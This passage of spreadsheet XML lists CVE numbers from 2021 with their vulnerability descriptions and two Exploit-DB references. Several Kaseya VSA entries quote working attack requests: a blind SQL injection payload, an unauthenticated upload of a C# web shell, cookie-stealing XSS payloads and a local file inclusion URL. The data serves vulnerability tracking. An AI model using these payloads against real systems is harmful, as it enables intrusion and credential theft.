    <t>docsify 4.12.1 is affected by Cross Site Scripting (XSS) because the search component does not appropriately encode Code Blocks and mishandles the " character.</t>
  </si>
  <si>
    <t>CVE-2021-30080</t>
  </si>
  <si>
    <t>An issue was discovered in the route lookup process in beego through 2.0.1, allows attackers to bypass access control.</t>
  </si>
  <si>
    <t>CVE-2021-30081</t>
  </si>
  <si>
    <t>An issue was discovered in emlog 6.0.0stable. There is a SQL Injection vulnerability that can execute any SQL statement and query server sensitive data via admin/navbar.php?action=add_page.</t>
  </si>
  <si>
    <t>CVE-2021-30082</t>
  </si>
  <si>
    <t>An issue was discovered in Gris CMS v0.1. There is a Persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via admin/dashboard.</t>
  </si>
  <si>
    <t>CVE-2021-30083</t>
  </si>
  <si>
    <t>An issue was discovered in Mediat 1.4.1. There is a Reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML without authentication via the 'return' parameter in login.php.</t>
  </si>
  <si>
    <t>CVE-2021-30086</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in KindEditor (Chinese versions) 4.1.12, which can be exploited by an attacker to obtain user cookie information.</t>
  </si>
  <si>
    <t>CVE-2021-3010</t>
  </si>
  <si>
    <t>There are multiple persistent cross-site scripting (XSS) vulnerabilities in the web interface of OpenText Content Server Version 20.3. The application allows a remote attacker to introduce arbitrary JavaScript by crafting malicious form values that are later not sanitized.</t>
  </si>
  <si>
    <t>CVE-2021-30108</t>
  </si>
  <si>
    <t>Feehi CMS 2.1.1 is affected by a Server-side request forgery (SSRF) vulnerability. When the user modifies the HTTP Referer header to any url, the server can make a request to it.</t>
  </si>
  <si>
    <t>CVE-2021-30109</t>
  </si>
  <si>
    <t>Froala Editor 3.2.6 is affected by Cross Site Scripting (XSS). Under certain conditions, a base64 crafted string leads to persistent Cross-site scripting (XSS) vulnerability within the hyperlink creation module.</t>
  </si>
  <si>
    <t>CVE-2021-3011</t>
  </si>
  <si>
    <t>An electromagnetic-wave side-channel issue was discovered on NXP SmartMX / P5x security microcontrollers and A7x secure authentication microcontrollers, with CryptoLib through v2.9. It allows attackers to extract the ECDSA private key after extensive physical access (and consequently produce a clone). This was demonstrated on the Google Titan Security Key, based on an NXP A7005a chip. Other FIDO U2F security keys are also impacted (Yubico YubiKey Neo and Feitian K9, K13, K21, and K40) as well as several NXP JavaCard smartcards (J3A081, J2A081, J3A041, J3D145_M59, J2D145_M59, J3D120_M60, J3D082_M60, J2D120_M60, J2D082_M60, J3D081_M59, J2D081_M59, J3D081_M61, J2D081_M61, J3D081_M59_DF, J3D081_M61_DF, J3E081_M64, J3E081_M66, J2E081_M64, J3E041_M66, J3E016_M66, J3E016_M64, J3E041_M64, J3E145_M64, J3E120_M65, J3E082_M65, J2E145_M64, J2E120_M65, J2E082_M65, J3E081_M64_DF, J3E081_M66_DF, J3E041_M66_DF, J3E016_M66_DF, J3E041_M64_DF, and J3E016_M64_DF).</t>
  </si>
  <si>
    <t>CVE-2021-30110</t>
  </si>
  <si>
    <t>dttray.exe in Greyware Automation Products Inc Domain Time II before 5.2.b.20210331 allows remote attackers to execute arbitrary code via a URL to a malicious update in a spoofed response to the UDP query used to check for updates.</t>
  </si>
  <si>
    <t>CVE-2021-30111</t>
  </si>
  <si>
    <t>A stored XSS vulnerability exists in Web-School ERP V 5.0 via (Add Events) in the event name and description fields. An attack can inject a JavaScript code that will be stored in the page. If any visitor sees the events, then the payload will be executed.</t>
  </si>
  <si>
    <t>CVE-2021-30112</t>
  </si>
  <si>
    <t>Web-School ERP V 5.0 contains a cross-site request forgery (CSRF) vulnerability that allows a remote attacker to create a student_leave_application request through module/core/studentleaveapplication/create. The application fails to validate the CSRF token for a POST request using Guardian privilege.</t>
  </si>
  <si>
    <t>CVE-2021-30113</t>
  </si>
  <si>
    <t>A blind XSS vulnerability exists in Web-School ERP V 5.0 via (Add Events) in event name and description fields. An attacker can inject a JavaScript code that will be stored in the page. If any visitor sees the event, then the payload will be executed and sends the victim's information to the attacker website.</t>
  </si>
  <si>
    <t>CVE-2021-30114</t>
  </si>
  <si>
    <t>Web-School ERP V 5.0 contains a cross-site request forgery (CSRF) vulnerability that allows a remote attacker to create a voucher payment request through module/accounting/voucher/create. The application fails to validate the CSRF token for a POST request using admin privilege.</t>
  </si>
  <si>
    <t>CVE-2021-30116</t>
  </si>
  <si>
    <t>Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp When an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\Program Files (x86)\Kaseya\XXXXXXXXXX\KaseyaD.ini) which contains an Agent_Guid and AgentPassword This Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&amp;pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9) This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered --- * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact --- Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.</t>
  </si>
  <si>
    <t>CVE-2021-30117</t>
  </si>
  <si>
    <t>The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&amp;roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 &lt;!DOCTYPE html&gt; &lt;HTML&gt; &lt;HEAD&gt; &lt;title&gt;Whoops.&lt;/title&gt; &lt;meta http-equiv="X-UA-Compatible" content="IE=Edge" /&gt; &lt;link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"&gt;&lt;/link&gt; ----SNIP---- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&amp;roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 &lt;html&gt; &lt;head&gt; &lt;title&gt;Export Folder&lt;/title&gt; &lt;style&gt; ------ SNIP ----- ```</t>
  </si>
  <si>
    <t>CVE-2021-30118</t>
  </si>
  <si>
    <t>An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring &amp; Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&amp;PathData=C%3A%5CKaseya%5CWebPages%5C&amp;__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&amp;qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 &lt;%@ Page Language="C#" Debug="true" validateRequest="false" %&gt; &lt;%@ Import namespace="System.Web.UI.WebControls" %&gt; &lt;%@ Import namespace="System.Diagnostics" %&gt; &lt;%@ Import namespace="System.IO" %&gt; &lt;%@ Import namespace="System" %&gt; &lt;%@ Import namespace="System.Data" %&gt; &lt;%@ Import namespace="System.Data.SqlClient" %&gt; &lt;%@ Import namespace="System.Security.AccessControl" %&gt; &lt;%@ Import namespace="System.Security.Principal" %&gt; &lt;%@ Import namespace="System.Collections.Generic" %&gt; &lt;%@ Import namespace="System.Collections" %&gt; &lt;script runat="server"&gt; private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); &lt;snip&gt; ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.</t>
  </si>
  <si>
    <t>CVE-2021-30119</t>
  </si>
  <si>
    <t>Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=&lt;script&gt;alert(document.cookie)&lt;/script&gt;` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=";&lt;/script&gt;&lt;script&gt;alert(1);a="&amp;PathData=&amp;originalName=shell.aspx&amp;FileSize=4388&amp;TimeElapsed=00:00:00.078`</t>
  </si>
  <si>
    <t>CVE-2021-3012</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the Document Link of documents in ESRI Enterprise before 10.9 allows remote authenticated users to inject arbitrary JavaScript code via a malicious HTML attribute such as onerror (in the URL field of the Parameters tab).</t>
  </si>
  <si>
    <t>CVE-2021-30120</t>
  </si>
  <si>
    <t>Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in.</t>
  </si>
  <si>
    <t>CVE-2021-30121</t>
  </si>
  <si>
    <t>Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118</t>
  </si>
  <si>
    <t>CVE-2021-30123</t>
  </si>
  <si>
    <t>FFmpeg &lt;=4.3 contains a buffer overflow vulnerability in libavcodec through a crafted file that may lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30124</t>
  </si>
  <si>
    <t>The unofficial vscode-phpmd (aka PHP Mess Detector) extension before 1.3.0 for Visual Studio Code allows remote attackers to execute arbitrary code via a crafted phpmd.command value in a workspace folder.</t>
  </si>
  <si>
    <t>CVE-2021-30125</t>
  </si>
  <si>
    <t>Jamf Pro before 10.28.0 allows XSS related to inventory history, aka PI-009376.</t>
  </si>
  <si>
    <t>CVE-2021-30126</t>
  </si>
  <si>
    <t>Lightmeter ControlCenter 1.1.0 through 1.5.x before 1.5.1 allows anyone who knows the URL of a publicly available Lightmeter instance to access application settings, possibly including an SMTP password and a Slack access token, via a settings HTTP query.</t>
  </si>
  <si>
    <t>CVE-2021-30127</t>
  </si>
  <si>
    <t>TerraMaster F2-210 devices through 2021-04-03 use UPnP to make the admin web server accessible over the Internet on TCP port 8181, which is arguably inconsistent with the "It is only available on the local network" documentation. NOTE: manually editing /etc/upnp.json provides a partial but undocumented workaround.</t>
  </si>
  <si>
    <t>CVE-2021-30128</t>
  </si>
  <si>
    <t>Apache OFBiz has unsafe deserialization prior to 17.12.07 version</t>
  </si>
  <si>
    <t>CVE-2021-30129</t>
  </si>
  <si>
    <t>A vulnerability in sshd-core of Apache Mina SSHD allows an attacker to overflow the server causing an OutOfMemory error. This issue affects the SFTP and port forwarding features of Apache Mina SSHD version 2.0.0 and later versions. It was addressed in Apache Mina SSHD 2.7.0</t>
  </si>
  <si>
    <t>CVE-2021-3013</t>
  </si>
  <si>
    <t>ripgrep before 13 on Windows allows attackers to trigger execution of arbitrary programs from the current working directory via the -z/--search-zip or --pre flag.</t>
  </si>
  <si>
    <t>CVE-2021-30130</t>
  </si>
  <si>
    <t>phpseclib before 2.0.31 and 3.x before 3.0.7 mishandles RSA PKCS#1 v1.5 signature verification.</t>
  </si>
  <si>
    <t>CVE-2021-30132</t>
  </si>
  <si>
    <t>Cloudera Manager 7.2.4 has Incorrect Access Control, allowing Escalation of Privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30133</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in CloverDX Server 5.9.0, CloverDX 5.8.1, CloverDX 5.7.0, and earlier allows remote attackers to inject arbitrary web script or HTML via the sessionToken parameter of multiple methods in Simple HTTP API. This is resolved in 5.9.1 and 5.10.</t>
  </si>
  <si>
    <t>CVE-2021-30137</t>
  </si>
  <si>
    <t>Assyst 10 SP7.5 has authenticated XXE leading to SSRF via XML unmarshalling. The application allows users to send JSON or XML data to the server. It was possible to inject malicious XML data through several access points.</t>
  </si>
  <si>
    <t>CVE-2021-30139</t>
  </si>
  <si>
    <t>In Alpine Linux apk-tools before 2.12.5, the tarball parser allows a buffer overflow and crash.</t>
  </si>
  <si>
    <t>CVE-2021-3014</t>
  </si>
  <si>
    <t>In MikroTik RouterOS through 2021-01-04, the hotspot login page is vulnerable to reflected XSS via the target parameter.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49753.txt</t>
  </si>
  <si>
    <t>Composr 10.0.36 - Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2021-30140</t>
  </si>
  <si>
    <t>LiquidFiles 3.4.15 has stored XSS through the "send email" functionality when sending a file via email to an administrator. When a file has no extension and contains malicious HTML / JavaScript content (such as SVG with HTML content), the payload is executed upon a click. This is fixed in 3.5.</t>
  </si>
  <si>
    <t>CVE-2021-30141</t>
  </si>
  <si>
    <t>** DISPUTED ** Module/Settings/UserExport.php in Friendica through 2021.01 allows settings/userexport to be used by anonymous users, as demonstrated by an attempted access to an array offset on a value of type null, and excessive memory consumption. NOTE: the vendor states "the feature still requires a valid authentication cookie even if the route is accessible to non-logged users."</t>
  </si>
  <si>
    <t>CVE-2021-30144</t>
  </si>
  <si>
    <t>The Dashboard plugin through 1.0.2 for GLPI allows remote low-privileged users to bypass access control on viewing information about the last ten events, the connected users, and the users in the tech category. For example, plugins/dashboard/front/main2.php can be used.</t>
  </si>
  <si>
    <t>CVE-2021-30145</t>
  </si>
  <si>
    <t>A format string vulnerability in mpv through 0.33.0 allows user-assisted remote attackers to achieve code execution via a crafted m3u playlist file.</t>
  </si>
  <si>
    <t>CVE-2021-30146</t>
  </si>
  <si>
    <t>Seafile 7.0.5 (2019) allows Persistent XSS via the "share of library functionality."</t>
  </si>
  <si>
    <t>CVE-2021-30147</t>
  </si>
  <si>
    <t>DMA Softlab Radius Manager 4.4.0 allows CSRF with impacts such as adding new manager accounts via admin.php.</t>
  </si>
  <si>
    <t>CVE-2021-30149</t>
  </si>
  <si>
    <t>Composr 10.0.36 allows upload and execution of PHP files.</t>
  </si>
  <si>
    <t>CVE-2021-30150</t>
  </si>
  <si>
    <t>Composr 10.0.36 allows XSS in an XML script.</t>
  </si>
  <si>
    <t>CVE-2021-30151</t>
  </si>
  <si>
    <t>Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.</t>
  </si>
  <si>
    <t>CVE-2021-30152</t>
  </si>
  <si>
    <t>An issue was discovered in MediaWiki before 1.31.13 and 1.32.x through 1.35.x before 1.35.2. When using the MediaWiki API to "protect" a page, a user is currently able to protect to a higher level than they currently have permissions for.</t>
  </si>
  <si>
    <t>CVE-2021-30154</t>
  </si>
  <si>
    <t>An issue was discovered in MediaWiki before 1.31.12 and 1.32.x through 1.35.x before 1.35.2. On Special:NewFiles, all the mediastatistics-header-* messages are output in HTML unescaped, leading to XSS.</t>
  </si>
  <si>
    <t>CVE-2021-30155</t>
  </si>
  <si>
    <t>An issue was discovered in MediaWiki before 1.31.12 and 1.32.x through 1.35.x before 1.35.2. ContentModelChange does not check if a user has correct permissions to create and set the content model of a nonexistent page.</t>
  </si>
  <si>
    <t>CVE-2021-30156</t>
  </si>
  <si>
    <t>An issue was discovered in MediaWiki before 1.31.12 and 1.32.x through 1.35.x before 1.35.2. Special:Contributions can leak that a "hidden" user exists.</t>
  </si>
  <si>
    <t>CVE-2021-30157</t>
  </si>
  <si>
    <t>An issue was discovered in MediaWiki before 1.31.12 and 1.32.x through 1.35.x before 1.35.2. On ChangesList special pages such as Special:RecentChanges and Special:Watchlist, some of the rcfilters-filter-* label messages are output in HTML unescaped, leading to XSS.</t>
  </si>
  <si>
    <t>CVE-2021-30158</t>
  </si>
  <si>
    <t>An issue was discovered in MediaWiki before 1.31.12 and 1.32.x through 1.35.x before 1.35.2. Blocked users are unable to use Special:ResetTokens. This has security relevance because a blocked user might have accidentally shared a token, or might know that a token has been compromised, and yet is not able to block any potential future use of the token by an unauthorized party.</t>
  </si>
  <si>
    <t>CVE-2021-30159</t>
  </si>
  <si>
    <t>An issue was discovered in MediaWiki before 1.31.12 and 1.32.x through 1.35.x before 1.35.2. Users can bypass intended restrictions on deleting pages in certain "fast double move" situations. MovePage::isValidMoveTarget() uses FOR UPDATE, but it's only called if Title::getArticleID() returns non-zero with no special flags. Next, MovePage::moveToInternal() will delete the page if getArticleID(READ_LATEST) is non-zero. Therefore, if the page is missing in the replica DB, isValidMove() will return true, and then moveToInternal() will unconditionally delete the page if it can be found in the master.</t>
  </si>
  <si>
    <t>CVE-2021-30161</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 11 software. Attackers can bypass the lockscreen protection mechanism after an incoming call has been terminated. The LG ID is LVE-SMP-210002 (April 2021).</t>
  </si>
  <si>
    <t>CVE-2021-30162</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 4.4 through 11 software. Attackers can leverage ISMS services to bypass access control on specific content providers. The LG ID is LVE-SMP-210003 (April 2021).</t>
  </si>
  <si>
    <t>CVE-2021-30163</t>
  </si>
  <si>
    <t>Redmine before 4.0.8 and 4.1.x before 4.1.2 allows attackers to discover the names of private projects if issue-journal details exist that have changes to project_id values.</t>
  </si>
  <si>
    <t>CVE-2021-30164</t>
  </si>
  <si>
    <t>Redmine before 4.0.8 and 4.1.x before 4.1.2 allows attackers to bypass the add_issue_notes permission requirement by leveraging the Issues API.</t>
  </si>
  <si>
    <t>CVE-2021-30165</t>
  </si>
  <si>
    <t>The default administrator account &amp; password of the EDIMAX wireless network camera is hard-coded. Remote attackers can disassemble firmware to obtain the privileged permission and further control the devices.</t>
  </si>
  <si>
    <t>CVE-2021-30166</t>
  </si>
  <si>
    <t>The NTP Server configuration function of the IP camera device is not verified with special parameters. Remote attackers can perform a command Injection attack and execute arbitrary commands after logging in with the privileged permission.</t>
  </si>
  <si>
    <t>CVE-2021-30167</t>
  </si>
  <si>
    <t>The manage users profile services of the network camera device allows an authenticated. Remote attackers can modify URL parameters and further amend user’s information and escalate privileges to control the devices.</t>
  </si>
  <si>
    <t>CVE-2021-30168</t>
  </si>
  <si>
    <t>The sensitive information of webcam device is not properly protected. Remote attackers can unauthentically grant administrator’s credential and further control the devices.</t>
  </si>
  <si>
    <t>CVE-2021-30169</t>
  </si>
  <si>
    <t>The sensitive information of webcam device is not properly protected. Remote attackers can unauthentically grant user’s credential.</t>
  </si>
  <si>
    <t>CVE-2021-3017</t>
  </si>
  <si>
    <t>The web interface on Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.</t>
  </si>
  <si>
    <t>CVE-2021-30170</t>
  </si>
  <si>
    <t>Special characters of ERP POS customer profile page are not filtered in users’ input, which allow remote authenticated attackers can inject malicious JavaScript and carry out stored XSS (Stored Cross-site scripting) attacks, additionally access and manipulate customer’s information.</t>
  </si>
  <si>
    <t>CVE-2021-30171</t>
  </si>
  <si>
    <t>Special characters of ERP POS news page are not filtered in users’ input, which allow remote authenticated attackers can inject malicious JavaScript and carry out stored XSS (Stored Cross-site scripting) attacks, additionally access and manipulate customer’s information.</t>
  </si>
  <si>
    <t>CVE-2021-30172</t>
  </si>
  <si>
    <t>Special characters of picture preview page in the Quan-Fang-Wei-Tong-Xun system are not filtered in users’ input, which allow remote authenticated attackers can inject malicious JavaScript and carry out Reflected XSS (Cross-site scripting) attacks, additionally access and manipulate customer’s information.</t>
  </si>
  <si>
    <t>CVE-2021-30173</t>
  </si>
  <si>
    <t>Local File Inclusion vulnerability of the omni-directional communication system allows remote authenticated attacker inject absolute path into Url parameter and access arbitrary file.</t>
  </si>
  <si>
    <t>36</t>
  </si>
  <si>
    <t>CVE-2021-30174</t>
  </si>
  <si>
    <t>RiyaLab CloudISO event item is added, special characters in specific field of time management page are not properly filtered, which allow remote authenticated attackers can inject malicious JavaScript and carry out stored XSS (Stored Cross-site scripting) attacks.</t>
  </si>
  <si>
    <t>CVE-2021-30175</t>
  </si>
  <si>
    <t>ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page.</t>
  </si>
  <si>
    <t>CVE-2021-30176</t>
  </si>
  <si>
    <t>The ZEROF Expert pro/2.0 application for mobile devices allows SQL Injection via the Authorization header to the /v2/devices/add endpoint.</t>
  </si>
  <si>
    <t>CVE-2021-30177</t>
  </si>
  <si>
    <t>There is a SQL Injection vulnerability in PHP-Nuke 8.3.3 in the User Registration section, leading to remote code execution. This occurs because the U.S. state is not validated to be two letters, and the OrderBy field is not validated to be one of LASTNAME, CITY, or STATE.</t>
  </si>
  <si>
    <t>CVE-2021-30178</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel through 5.11.11. synic_get in arch/x86/kvm/hyperv.c has a NULL pointer dereference for certain accesses to the SynIC Hyper-V context, aka CID-919f4ebc5987.</t>
  </si>
  <si>
    <t>CVE-2021-30179</t>
  </si>
  <si>
    <t>Apache Dubbo prior to 2.6.9 and 2.7.9 by default supports generic calls to arbitrary methods exposed by provider interfaces. These invocations are handled by the GenericFilter which will find the service and method specified in the first arguments of the invocation and use the Java Reflection API to make the final call. The signature for the $invoke or $invokeAsync methods is Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object; where the first argument is the name of the method to invoke, the second one is an array with the parameter types for the method being invoked and the third one is an array with the actual call arguments. In addition, the caller also needs to set an RPC attachment specifying that the call is a generic call and how to decode the arguments. The possible values are: - true - raw.return - nativejava - bean - protobuf-json An attacker can control this RPC attachment and set it to nativejava to force the java deserialization of the byte array located in the third argument.</t>
  </si>
  <si>
    <t>CVE-2021-3018</t>
  </si>
  <si>
    <t>ipeak Infosystems ibexwebCMS (aka IPeakCMS) 3.5 is vulnerable to an unauthenticated Boolean-based SQL injection via the id parameter on the /cms/print.php page.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49372.txt</t>
  </si>
  <si>
    <t>IPeakCMS 3.5 - Boolean-based blind SQLi</t>
  </si>
  <si>
    <t>CVE-2021-30180</t>
  </si>
  <si>
    <t>Apache Dubbo prior to 2.7.9 support Tag routing which will enable a customer to route the request to the right server. These rules are used by the customers when making a request in order to find the right endpoint. When parsing these YAML rules, Dubbo customers may enable calling arbitrary constructors.</t>
  </si>
  <si>
    <t>CVE-2021-30181</t>
  </si>
  <si>
    <t>Apache Dubbo prior to 2.6.9 and 2.7.9 supports Script routing which will enable a customer to route the request to the right server. These rules are used by the customers when making a request in order to find the right endpoint. When parsing these rules, Dubbo customers use ScriptEngine and run the rule provided by the script which by default may enable executing arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-30183</t>
  </si>
  <si>
    <t>Cleartext storage of sensitive information in multiple versions of Octopus Server where in certain situations when running import or export processes, the password used to encrypt and decrypt sensitive values would be written to the logs in plaintext.</t>
  </si>
  <si>
    <t>CVE-2021-30184</t>
  </si>
  <si>
    <t>GNU Chess 6.2.7 allows attackers to execute arbitrary code via crafted PGN (Portable Game Notation) data. This is related to a buffer overflow in the use of a .tmp.epd temporary file in the cmd_pgnload and cmd_pgnreplay functions in frontend/cmd.cc.</t>
  </si>
  <si>
    <t>CVE-2021-30185</t>
  </si>
  <si>
    <t>CERN Indico before 2.3.4 can use an attacker-supplied Host header in a password reset link.</t>
  </si>
  <si>
    <t>CVE-2021-30186</t>
  </si>
  <si>
    <t>CODESYS V2 runtime system SP before 2.4.7.55 has a Heap-based Buffer Overflow.</t>
  </si>
  <si>
    <t>CVE-2021-30187</t>
  </si>
  <si>
    <t>CODESYS V2 runtime system SP before 2.4.7.55 has Improper Neutralization of Special Elements used in an OS Command.</t>
  </si>
  <si>
    <t>CVE-2021-30188</t>
  </si>
  <si>
    <t>CODESYS V2 runtime system SP before 2.4.7.55 has a Stack-based Buffer Overflow.</t>
  </si>
  <si>
    <t>CVE-2021-30189</t>
  </si>
  <si>
    <t>CODESYS V2 Web-Server before 1.1.9.20 has a Stack-based Buffer Overflow.</t>
  </si>
  <si>
    <t>CVE-2021-3019</t>
  </si>
  <si>
    <t>ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.</t>
  </si>
  <si>
    <t>CVE-2021-30190</t>
  </si>
  <si>
    <t>CODESYS V2 Web-Server before 1.1.9.20 has Improper Access Control.</t>
  </si>
  <si>
    <t>CVE-2021-30191</t>
  </si>
  <si>
    <t>CODESYS V2 Web-Server before 1.1.9.20 has a a Buffer Copy without Checking the Size of the Input.</t>
  </si>
  <si>
    <t>CVE-2021-30192</t>
  </si>
  <si>
    <t>CODESYS V2 Web-Server before 1.1.9.20 has an Improperly Implemented Security Check.</t>
  </si>
  <si>
    <t>CVE-2021-30193</t>
  </si>
  <si>
    <t>CODESYS V2 Web-Server before 1.1.9.20 has an Out-of-bounds Write.</t>
  </si>
  <si>
    <t>CVE-2021-30194</t>
  </si>
  <si>
    <t>CODESYS V2 Web-Server before 1.1.9.20 has an Out-of-bounds Read.</t>
  </si>
  <si>
    <t>CVE-2021-30195</t>
  </si>
  <si>
    <t>CODESYS V2 runtime system before 2.4.7.55 has Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2021-30199</t>
  </si>
  <si>
    <t>In filters/reframe_latm.c in GPAC 1.0.1 there is a Null Pointer Dereference, when gf_filter_pck_get_data is called. The first arg pck may be null with a crafted mp4 file,which results in a crash.</t>
  </si>
  <si>
    <t>CVE-2021-3020</t>
  </si>
  <si>
    <t>An issue was discovered in ClusterLabs Hawk (aka HA Web Konsole) through 2.3.0-15. It ships the binary hawk_invoke (built from tools/hawk_invoke.c), intended to be used as a setuid program. This allows the hacluster user to invoke certain commands as root (with an attempt to limit this to safe combinations). This user is able to execute an interactive "shell" that isn't limited to the commands specified in hawk_invoke, allowing escalation to root.</t>
  </si>
  <si>
    <t>CVE-2021-30201</t>
  </si>
  <si>
